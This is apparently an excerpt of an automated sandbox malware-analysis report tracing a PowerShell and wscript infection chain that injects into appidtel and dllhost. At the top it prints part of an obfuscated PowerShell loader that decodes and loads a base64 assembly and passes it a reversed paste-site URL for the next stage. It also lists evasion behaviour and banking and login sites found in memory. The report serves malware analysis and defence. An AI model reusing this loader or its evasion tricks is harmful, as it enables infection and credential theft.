[Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD34777563 push ebx; iretd 4_2_00007FFD3477756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347771B4 push E95C8F86h; ret 4_2_00007FFD347771E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004141F2 push edi; ret 5_2_004141FB
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004030F0 push eax; ret 5_2_004030F2
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_00401945 push eax; iretd 5_2_00401948
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0041F1EC push ds; ret 5_2_0041F1ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0040222D push ecx; ret 5_2_00402235
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004014FC push ecx; ret 5_2_004014FE
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0041A583 push ebx; ret 5_2_0041A597
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_00417D86 push eax; iretd 5_2_00417D8E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0041167D push eax; iretd 5_2_0041167E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_004016AB push ecx; ret 5_2_004016C5
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0321225F pushad ; ret 5_2_032127F9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032127FA pushad ; ret 5_2_032127F9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03219939 push es; iretd 5_2_03219940
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032409AD push ecx; mov dword ptr [esp], ecx5_2_032409B6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0321283D push eax; iretd 5_2_03212858
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_03043929 pushfd ; iretd 10_2_0304392A
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_0304DE18 push eax; iretd 10_2_0304DE19
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_03056D1E push ebx; ret 10_2_03056D32
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 10_2_03054521 push eax; iretd 10_2_03054529
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038109AD push ecx; mov dword ptr [esp], ecx11_2_038109B6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0309C0F9 push ds; ret 11_2_0309C0FA
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0308E58A push eax; iretd 11_2_0308E58B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03097490 push ebx; ret 11_2_030974A4
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030A0BA6 push es; retf 11_2_030A0BB0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030A0E85 push ebp; retf 11_2_030A0E86
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03094C93 push eax; iretd 11_2_03094C9B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0368A39A pushfd ; ret 11_2_0368A3A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03695272 push eax; ret 11_2_03695274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0368C1BD push ebp; ret 11_2_0368C1BE
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
              Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
              Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
              Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
              Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
              Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
              Source: C:\Windows\SysWOW64\dllhost.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BD1C0 rdtsc 5_2_032BD1C0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD347799BE sldt word ptr [eax]4_2_00007FFD347799BE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1611Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1493Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4475Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5377Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeWindow / User API: threadDelayed 1439Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeWindow / User API: threadDelayed 8534Jump to behavior
              Source: C:\Windows\SysWOW64\appidtel.exeAPI coverage: 0.8 %
              Source: C:\Windows\SysWOW64\dllhost.exeAPI coverage: 2.8 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5412Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 4475 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep count: 5377 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096Thread sleep time: -15679732462653109s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908Thread sleep count: 1439 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908Thread sleep time: -2878000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908Thread sleep count: 8534 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exe TID: 3908Thread sleep time: -17068000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe TID: 1592Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\dllhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0309C3C0 FindFirstFileW,FindNextFileW,FindClose,11_2_0309C3C0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: -400GIK8.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: -400GIK8.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: -400GIK8.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: -400GIK8.11.drBinary or memory string: discord.comVMware20,11696487552f
              Source: -400GIK8.11.drBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696487552
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169648
              Source: -400GIK8.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: QEwzeZKCXN.exe, 0000000C.00000002.3411016240.000000000124F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swordVMware20,11696487552}
              Source: -400GIK8.11.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116964875
              Source: -400GIK8.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
              Source: -400GIK8.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: -400GIK8.11.drBinary or memory string: global block list test formVMware20,11696487552
              Source: -400GIK8.11.drBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: -400GIK8.11.drBinary or memory string: AMC password management pageVMware20,11696487552
              Source: -400GIK8.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: firefox.exe, 0000000D.00000002.3048982988.0000015C8A0DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
